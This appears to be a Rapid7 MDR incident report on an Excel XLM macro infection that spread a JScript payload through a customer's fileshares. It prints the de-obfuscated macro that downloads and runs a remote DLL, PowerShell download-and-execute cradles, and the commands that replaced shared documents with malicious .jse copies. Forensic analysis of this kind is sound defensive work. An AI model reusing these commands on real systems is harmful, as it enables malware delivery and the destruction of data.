Rapid7 MDR Incident Report Prepared For:
ACME Anvil Co.
Executive Summary
On March 24th, 2020, Rapid7’s Managed Detection and Response (MDR) identified the execution of a malicious document which downloaded malware onto Asset01. This malware was able to enumerate fileshares and attempted to spread itself to other assets in the ACME Anvil Co. environment. Rapid7 MDR identified three assets (Asset02, Asset03, and Asset04) that the malware successfully spread to before it’s spreading mechanism was stopped by ACME Anvil Co. staff. (Note: All user/host names, file paths, and any other customer-specific data has been altered or redacted.)
Direct any additional questions or concerns to the Customer Advisor:
- Customer Advisor: customer_advisor@rapid7.com.
If outside of normal business hours, contact mdr@rapid7.com or Rapid7’s 24/7 hotline:
| Region | 24/7 Hotline Number |
|---|---|
| United States (US) | +1-844-867-5309 |
| European Union (EU) | +44-800-867-5309 |
| Singapore (SG) | +65-800-867-5309 |
Detailed Analysis
March 24th, 2020 at 2020-03-24 15:29:41 UTC, user ACME\Account01 opened an email attachment notif2374.xls (MD5: c1049e9580998030aa9e22059b3ca9fd). This Excel document was obtained and analyzed. It contained a visual lure to trick a user into enabling active content: 
If enabled, an XLM Macro would be executed from a hidden sheet within the spreadsheet.
This macro would attempt to execute the following code (De-obfuscated):
IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
IF(GET.WORKSPACE(19),,CLOSE(TRUE))
IF(GET.WORKSPACE(42),,CLOSE(TRUE))
IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),CLOSE(TRUE))
CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"hXXps://grpxmqnrb[.]pw/ehrj4g9g","c:\Users\Public\gef3fff.html",0,0)ALERT("TheworkbookcannotbeopenedorrepairedbyMicrosoftExcelbecauseit'scorrupt.",2)
CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\gef3fff.html,DllRegisterServer",0,5)CLOSE(FALSE)The first two lines of this code attempt to determine if the window displaying the file is smaller than 770x381 pixels and closes without executing any other code. The next line determines if a mouse is present. The fourth line determines if a soundcard is installed on in the Operating System. The fifth line determines if the operating system is Microsoft Windows. These commands are likley attempts to determine if the spreadsheet has been opened in a sandbox for analysis.
If the correct conditions are met, this code will then attempt to download a DLL from hXXps://grpxmqnrb[.]pw/ehrj4g9g (8.208.28[.]247) and save it to c:\Users\Public\gef3fff.html while displaying a notification to the user containing the following text “TheworkbookcannotbeopenedorrepairedbyMicrosoftExcelbecauseit’scorrupt.”
Afterward it will attempt to execute code from the “DllRegisterServer” function within the DLL that was downloaded.
Evidence of this activity can be observed in process logs on Asset01:
"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\account01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\U9PKY2Y6\notif2374.xls
C:\Windows\SysWOW64\rundll32.exe c:\Users\Public\gef3fff.html,DllRegisterServerRapid7 MDR was unable to obtain this dll for analysis.
Rapid7 MDR identified records of DNS queries for grpxmqnrb[.]pw originating from Asset01. After these entries, Rapid7 MDR also identified from the same host, DNS queries for wgyvjbse[.]pw and botiq[.]xyz. Both of these domains are suspected to be associated with this attackers infrastructure.
DNS Evidence
Rapid7 identified the following DNS lookups that are malicious in nature.
Table - DNS lookups found in InsightIDR
After this activity, Rundll32.exe executed a subprocess of msiexec. This subprocess was used to enumerate information about the localhost and its local network:
cmd.exe /c net view /all
net view /all
cmd.exe /c ipconfig /all
cmd.exe /c net view /all
net view /allApproximately 3 hours after initial infection, the attacker ran a malicious executable fk.exe (MD5: f51d7d54c34f0dbe620c00e8eb7dbca8):
C:\Users\account01\AppData\Local\Temp\fk.exe
cmd /c time /T && fcktv.jse && type fcktv.txt
C:\Windows\System32\WScript.exe C:\Users\account01\AppData\Local\Temp\IXP000.TMP\fcktv.jseThe functionality of this executable is to extract a malicious javascript file fcktv.jse and execute it.
This javascript code will copy itself to the users "AppData" folder and execute itself from there:
C:\Windows\System32\wscript.exe /B /E:JScript C:\Users\account01\AppData\Local\Temp\32b63f6b.kert 0Note: wscript.exe is a legitimate Microsoft Utility which interprets script files and executes their contents. In this instance it is being used to execute the contents of a malicious script.
This javascript file closely resembles a Ostap payload Rapid7 MDR previously analyzed in blog post here: https://blog.rapid7.com/2019/11/14/we-dont-want-white-font-office-macros-evasion-and-malicious-self-reference/, however this code has some slight variations in it’s execution. This javascript code was heavily obfuscated, a sample of the partially de-obfuscated code is below: 
This script would attempt to enumerate all files on all mapped drives with the following file extension:
.odc
.odb
.wps
.xlk
.ppt
.pst
.dwg
.dxf
.dxg
.wpd
.doc
.xls
.pdf
.rtf
.txt
.pub
.mpp
.vsdx
.odt
.ods
.odp
.odmAfter enumerating all said files, it would create files with the same name and a file extension of .jse. The files would contain the code from the Javascript which would then be executed by any user that clicked on the file. The code would then delete the original files from the shared drive.
Rapid7 MDR observed the execution of this functionality via Process Start data from Asset01.
C:\Windows\System32\cmd.exe /U /Q /C cd /D G: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
C:\Windows\System32\cmd.exe /U /Q /C cd /D K: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Client Analysis.jse" && del /Q /F "G:\Client Analysis.xls"
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Client Analysis2.jse" && del /Q /F "G:\Client Analysis2.xls"
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Account Documents\Account Business Review February 2019.jse" && del /Q /F "G:\Account Documents\Account Business Review February 2019.pptx"
\??\C:\windows\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Account Documents\Technology Interface Training Deck (003).jse" && del /Q /F "G:\Account Documents\Technology Interface Training Deck (003).pptx"
\??\C:\windows\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Account Documents\File.jse" && del /Q /F "G:\Account Documents\File.pst"
[-- truncated for brevity --]This script is also capable of reaching out to hXXps://185.216.35[.]18/5YGJuk/SVmP9W.php and receiving commands to execute or executables to run.
This code appears to have been used to enumerate information about users on the local domain, the compromised user account, accessibility of assets on the network,
C:\windows\system32\cmd.exe /C net users /domain
C:\windows\system32\net1 user ACME\Account01 /domainAfter this, the code executed commands to enumerate assets on the local network and the permissions the compromised user account ACME\Account01 had to those assets.
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:44420/'); Find-LocalAdminAccess -Threads 64
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:6040/'); Get-NetComputer | %{Resolve-IPAddress -ComputerName $_.dnshostname} | ft -auto
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13023/'); nslookup -q=srv _kerberos._tcp
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:42285/'); nslookup -q=srv _kerberos._tcp
ping AssetXXX
ping AssetXXY
ping AssetXXZ
ping AssetXYY
ping AssetXYZ
ping AssetYYY
ping AssetYYZ
ping AssetYXZLastly, the attacker attempted to enumerate subnet information about the domain, however at the time of this process execution the asset had been quarantined:
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('hXXp://127.0.0[.]1:21409/'); [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.SubnetsRapid7 MDR identified 3 assets that executed the malicious javascript code from a network share and were infected:
Asset: Asset02
User: ACME/Account02
Command Execution: C:\Windows\System32\WScript.exe "G:\Supplementary Documents\Client_VM Log\Comprehensive VM Log March 2020.jse"
Asset: Asset03
User: ACME/Account03
Command Execution: C:\Windows\System32\WScript.exe "G:\Supplementary Documents\Client_VM Log\Comprehensive VM Log April 2020.jse"
Asset: Asset04
User: ACME/Account04
Command Execution: C:\Windows\System32\WScript.exe "G:\Supplementary Documents\Client_VM Log\Comprehensive VM Log MASTER.jse"Assets Asset03 and Asset04 were taken offline before they had a chance to spread.
On asset Asset02, the code was able to execute and began attempting to copy itself to the network drives mapped by user account ACME/Account02
C:\Windows\System32\wscript.exe /B /E:JScript C:\Users\Account02\AppData\Local\Temp\d94309c6.kert 0
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\WINDOWS\SysWOW64\SearchProtocolHost.exe Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-551553347-692472059-1844936127-19920151_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-551553347-692472059-1844936127-19920151 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc DownLevelDaemon 1
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\Users\Account02\AppData\Local\Temp\d94309c6.Swan_1262.cmd 1262
C:\Windows\System32\cmd.exe /U /Q /C cd /D H: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /U /Q /C cd /D K: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\Windows\System32\cmd.exe /U /Q /C cd /D L: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\WINDOWS\system32\WerFault.exe -u -p 13996 -s 1320
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\WINDOWS\system32\BackgroundTaskHost.exe -ServerName:BackgroundTaskHost.WebAccountProvider
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\SOP 9.jse" && del /Q /F "H:\SOP 9.13.19.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Escalation Procedure 9.jse" && del /Q /F "H:\Escalation Procedure 9.5.19.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Progress Report.jse" && del /Q /F "H:\Progress Report.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Standard Formats.jse" && del /Q /F "H:\Standard Formats.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Product Inventory_1-08-20.jse" && del /Q /F "H:\Product Inventory_1-08-20.pdf"
[-- truncated for brevity --]Process Start logs indicate the attacker was able to spread this malware to ACME/Account02’s “H:” and “K:” drives but the asset was taken offline before it could reach the “L:” drive.
Firewall logs for all assets identified as compromised in this investigation did not contain entries for connections to external address space. This suggests that the users were either on split-tunnel vpn connections at the time of investigation or that there is a visibility gap with regards to Firewall logging. As such, connections to malicious infrastructure could not be confirmed via Firewall logs.
After this activity, ACME Anvil Co. staff took proactive action and removed user access to shared drives and began restoring files from backup.
Relevant Investigations
Rapid7 identified the following InsightIDR investigations related to the activity in this incident report.
Table - Relevant Investigations From InsightIDR
Process Evidence
Rapid7 identified the following processes that are malicious in nature.
Table - Processes Captured By InsightAgent
Indicators Of Compromise
Rapid7 identified the following Indicators of Compromise (IOC) that are related to malicious actor activity.
Table - Indicators Of Compromise
Remediation Recommendations
This section provides the following remediation recommendations to contain the threat:
| Priority | LOE | Recommendation |
|---|---|---|
| High | Moderate | Rebuild Affected Systems from a Known-Good Baseline Image Rebuild systems from a known-good baseline image to counter undetected threats. Manually removing malware or scanning with an updated antivirus solution may not fully restore the integrity of the system. |
| High | Low | Block Malicious Domains Block the identified malicious Domains at all appropriate network filtering and Domain Name Server devices, such as firewalls, web proxies, and DNS servers. |
| High | Low | Block Malicious IP Addresses Block the identified malicious IP addresses at all appropriate network filtering devices, such as firewalls, web proxies, routers, and switches. |
| High | Low | Quarantine Network Traffic from Affected Endpoints Immediately quarantine the affected endpoints from the network. InsightConnect could be used to perform these actions, which can be accessed through the ‘Take Action’ button at relevant investigations. |
| High | Low | Lock the Affected Accounts Lock the affected accounts until their credentials are rotated. InsightConnect could be used to perform these actions, which can be accessed through the ‘Take Action’ button at relevant investigations. |
| High | Low | Change Passwords for Affected Accounts Change the affected account passwords as soon as possible to prevent a malicious actor from leveraging the credentials to access services. Instruct users to not just change one character of a password, such as changing Example1! to Example2!. A malicious actor who has captured past credentials could be more successful in guessing credentials changed by only one character. InsightConnect could be used to perform these actions, which can be accessed through the ‘Take Action’ button at relevant investigations. |
| High | Medium | Restore Fileshare data from backup During the period the attacker was active on the network, they were able to spread malware via files on a network fileshares. Rapid7 recommends restoring those drives from backup to ensure complete removal of all malware artifacts and to restore all data. |
Mitigation Recommendations
This section provides the following mitigation recommendations to prevent this threat from occurring in the future:
| Priority | LOE | Recommendation |
|---|---|---|
| High | Moderate | Update Frequently Targeted Applications Update frequently targeted applications, such as the Microsoft Office suite, Adobe Flash, Adobe Acrobat, and Internet browsers to reduce the likelihood of compromise from exploit kits, phishing, and targeted attacks. |
| Moderate | Low | Prevent Execution of Office Macros via Group Policy Disable macros execution in the Microsoft Office suite from untrusted locations. Office macros account for approximately 98% of Office malware. Disabling macros decreases the attack surface of user workstations. For more information on disabling macros using AD GPOs click here. |
| Moderate | Low | Prevent Activation of OLE Packages in Word Documents Prevent the activation of OLE packages in Microsoft Word to prevent users from launching malicious packages. Create a registry key at ‘HKCU<Office Version>' with the name ’PackagerPrompt’, then type ‘REG_DWORD’ and the value ‘2’. For more information, see the articles provided here and here. |
| High | Low | Implement User Awareness Training Implement phishing-based training for users identified as opening unknown attachments or clicking unknown links. Train users on how to forward suspicious links to security for analysis. |
| Moderate | Moderate | Disable Split-Tunnel VPN Configurations Ensure that all VPN users have their entire network traffic tunneled through the VPN to reduce the risk of a malicious actor connecting to the endpoint. Split-tunnel VPNs allow connections from a remotely connected endpoint to traverse a potentially untrusted network. |
| Moderate | Moderate | Harden Systems Based on Industry Guidelines Follow vendor-recommended guidelines for security settings on Windows platforms provided here and here. |
Appendix A: Criticality Matrix
Criticality Matrix
Rapid7 assesses the criticality of findings based on malicious actor intent and sample capability. By combining malicious actor threat intelligence and knowledge of attack tools, Rapid7 determines the overall risk and potential impact of each finding and delivers that context to MDR clients.
Threat Intent And Capability
Intent
The purpose or motivation driving malicious actions, including distributing spam to generate revenue, breaching an organization to capture intellectual property, or leaking privileged information to damage an organization’s public reputation.
Capability
The features inherent to malicious tools or compromised accounts. The capability of a utility, such as a port scanner, is low as it is a single-purpose utility incapable of executing remote commands or exploiting systems. The capabilities of a remote access Trojan is moderate, as it allows for remote code execution and remote system interaction.
Threat Criticality
Critical Risk
A malicious actor’s intent is to tailor malware, Command and Control servers, and ingress methods to a specific target or organization. The malware is custom made, often modular, and is capable of remote code execution, credential harvesting, remote access, and file download and upload. These can carry a unique campaign code for the organization in malware beacons, and may be deployed by spear phishing, social engineering, zero-day exploitation, or strategic web compromise.
High Risk
A malicious actor’s intent is to target a specific resource by reusing well-known malware after successfully compromising a system. The malware is capable of remote code execution and remote desktop interaction, and include targeted COTS backdoor deployed through spear phishing, social engineering, or strategic web compromise.
Moderate Risk
A malicious actor’s intent is to harvest third-party credentials using at-scale financial fraud or perpetuating malware infections for banking services, cloud services, and email. These compromises are opportunistic and automatic. Malware may be capable of executing additional malware, but with limited data theft.
Low Risk
A malicious actor’s intent is to indiscriminately distribute revenue-generating applications to users, such as spam email. Adware and potentially unwanted programs (PUP) are not capable of remote code execution, credential harvesting, or data theft.